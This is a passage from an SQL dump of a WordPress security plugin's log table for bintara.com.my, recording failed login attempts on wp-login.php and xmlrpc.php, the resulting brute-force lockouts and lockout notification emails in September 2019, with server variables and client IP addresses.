09:43:54',18203200,19503496,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.233.82'),(23570,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.252.132.100\";s:11:\"REMOTE_PORT\";s:5:\"59158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzocLKqO4n7fHB27AQipAAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567418480.9939\";s:12:\"REQUEST_TIME\";s:10:\"1567418480\";}}','notice','2019-09-02 10:01:22','2019-09-02 10:01:21',17687920,19180304,'https://bintara.com.my/wp-login.php',1,0,'89.252.132.100'),(23571,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"89.252.132.100\";s:11:\"REMOTE_PORT\";s:5:\"59710\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWzoc7KqO4n7fHB27AQipQAAAIk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567418484.0799\";s:12:\"REQUEST_TIME\";s:10:\"1567418484\";}}','notice','2019-09-02 10:01:25','2019-09-02 10:01:24',18205848,19505240,'https://bintara.com.my/xmlrpc.php',1,0,'89.252.132.100'),(26136,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:08:54\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:08:54\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:08:54\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:08:54\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:08:55','2019-09-21 14:08:54',17937640,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.165.118.82'),(26137,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:08:55','2019-09-21 14:08:54',18144448,19344160,'https://bintara.com.my/wordpress/wp-login.php',1,0,'185.165.118.82'),(26138,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvEHkXpgmG5P@iB8k6XgAAAIU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"217.25.25.246\";s:11:\"REMOTE_PORT\";s:5:\"47238\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvEHkXpgmG5P@iB8k6XgAAAIU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074960.1673\";s:12:\"REQUEST_TIME\";s:10:\"1569074960\";}}','notice','2019-09-21 14:09:21','2019-09-21 14:09:20',17846288,19336784,'https://bintara.com.my/wp/wp-login.php',1,0,'217.25.25.246'),(26139,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:09:20\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:09:20\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:09:20\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:09:20\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:09:21','2019-09-21 14:09:20',17931248,19336784,'https://bintara.com.my/wp/wp-login.php',1,0,'217.25.25.246'),(26140,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:09:21','2019-09-21 14:09:20',18137632,19336784,'https://bintara.com.my/wp/wp-login.php',1,0,'217.25.25.246'),(26141,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvEliJ7D9Gn7wDPh8lFwAAANQ\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.90.224.155\";s:11:\"REMOTE_PORT\";s:5:\"34592\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvEliJ7D9Gn7wDPh8lFwAAANQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074963.0051\";s:12:\"REQUEST_TIME\";s:10:\"1569074963\";}}','notice','2019-09-21 14:09:24','2019-09-21 14:09:23',17849800,19339464,'https://bintara.com.my/blog/wp-login.php',1,0,'103.90.224.155'),(26142,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:09:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:09:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:09:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:09:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:09:24','2019-09-21 14:09:23',17934600,19339464,'https://bintara.com.my/blog/wp-login.php',1,0,'103.90.224.155'),(26143,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:09:24','2019-09-21 14:09:23',18141008,19339464,'https://bintara.com.my/blog/wp-login.php',1,0,'103.90.224.155'),(26144,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvLXkXpgmG5P@iB8k6eQAAAJc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"47.91.229.187\";s:11:\"REMOTE_PORT\";s:5:\"53782\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvLXkXpgmG5P@iB8k6eQAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569074989.9522\";s:12:\"REQUEST_TIME\";s:10:\"1569074989\";}}','notice','2019-09-21 14:09:51','2019-09-21 14:09:50',17850944,19342672,'https://bintara.com.my/wordpress/wp-login.php',1,0,'47.91.229.187'),(26145,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:09:50\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:09:50\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:09:50\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:09:50\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:09:51','2019-09-21 14:09:50',17935440,19342672,'https://bintara.com.my/wordpress/wp-login.php',1,0,'47.91.229.187'),(26146,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:09:51','2019-09-21 14:09:50',18141824,19342672,'https://bintara.com.my/wordpress/wp-login.php',1,0,'47.91.229.187'),(26147,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYvRliJ7D9Gn7wDPh8lJQAAAMA\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.36.222\";s:11:\"REMOTE_PORT\";s:5:\"37578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYvRliJ7D9Gn7wDPh8lJQAAAMA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569075015.033\";s:12:\"REQUEST_TIME\";s:10:\"1569075015\";}}','notice','2019-09-21 14:10:16','2019-09-21 14:10:15',17849640,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.36.222'),(26148,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:10:15\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:10:15\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:10:15\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:10:15\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:10:16','2019-09-21 14:10:15',17934368,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.36.222'),(26149,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:10:16','2019-09-21 14:10:15',18140840,19338184,'https://bintara.com.my/test/wp-login.php',1,0,'166.62.36.222'),(26150,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 